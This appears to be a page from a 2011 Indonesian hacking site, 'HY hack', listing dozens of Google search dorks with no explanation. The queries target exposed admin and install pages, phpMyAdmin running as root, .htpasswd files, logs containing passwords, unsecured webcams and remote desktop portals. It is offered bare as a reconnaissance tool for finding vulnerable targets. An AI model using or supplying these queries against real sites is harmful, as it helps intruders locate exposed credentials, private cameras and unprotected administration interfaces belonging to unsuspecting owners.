“Welcome to Intranet”
“Welcome to PHP-Nuke” congratulations
“Welcome to the Prestige Web-Based Configurator”
“YaBB SE Dev Team”
“you can now password” | “this is a special page only seen by you. your profile visitors” inurl:imchaos
(“Indexed.By”|”Monitored.By”) hAcxFtpScan
(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)
allinurl:”index.php” “site=sglinks”
allinurl:install/install.php
allinurl:intranet admin
filetype:cgi inurl:”fileman.cgi”
filetype:cgi inurl:”Web_Store.cgi”
filetype:php inurl:vAuthenticate
filetype:pl intitle:”Ultraboard Setup”
Gallery in configuration mode
Hassan Consulting’s Shopping Cart Version 1.18
intext:”Warning: * am able * write ** configuration file” “includes/configure.php” -
intitle:”Gateway Configuration Menu”
intitle:”Horde :: My Portal” -”[Tickets”
intitle:”Mail Server CMailServer Webmail” “5.2″
intitle:”MvBlog powered”
intitle:”Remote Desktop Web Connection”
intitle:”Samba Web Administration Tool” intext:”Help Workgroup”
intitle:”Terminal Services Web Connection”
intitle:”Uploader – Uploader v6″ -pixloads.com
intitle:osCommerce inurl:admin intext:”redistributable under the GNU” intext:”Online Catalog” -demo -site:oscommerce.com
intitle:phpMyAdmin “Welcome to phpMyAdmin ***” “running on * as root@*”
intitle:phpMyAdmin “Welcome to phpMyAdmin ***” “running on * as root@*”
inurl:”/NSearch/AdminServlet”
inurl:”index.php? module=ew_filemanager”
inurl:aol*/_do/rss_popup?blogID=
inurl:footer.inc.php
inurl:info.inc.php
inurl:ManyServers.htm
inurl:newsdesk.cgi? inurl:”t=”
inurl:pls/admin_/gateway.htm
inurl:rpSys.html
inurl:search.php vbulletin
inurl:servlet/webacc
natterchat inurl:home.asp -site:natterchat.co.uk
XOOPS Custom Installation
inurl:htpasswd filetype:htpasswd
inurl:yapboz_detay.asp + View Webcam User Accessing
allinurl:control/multiview
inurl:”ViewerFrame?Mode=”
intitle:”WJ-NT104 Main Page”
inurl:netw_tcp.shtml
intitle:”supervisioncam protocol”
“Duclassified” -site:duware.com “DUware All Rights reserved”
“duclassmate” -site:duware.com
“Dudirectory” -site:duware.com
“dudownload” -site:duware.com
“Elite Forum Version *.*”
“Link Department”
“sets mode: +k”
“your password is” filetype:log
“DUpaypal” -site:duware.com
 

Kontes SEO


Support : Abaut Us | Contact Us | Privacy Policy | Term of Use | Redaksi | Advertise | Lowongan Kerja | Forum | Tabloit | Mobile Version | Hy Hack Toolbar
Copyright © 2011. HY hack - All Rights Reserved Template Created by Heykhend
Published by Heykhend Corp. Developed by PT Heykhend Publik Media (HPM)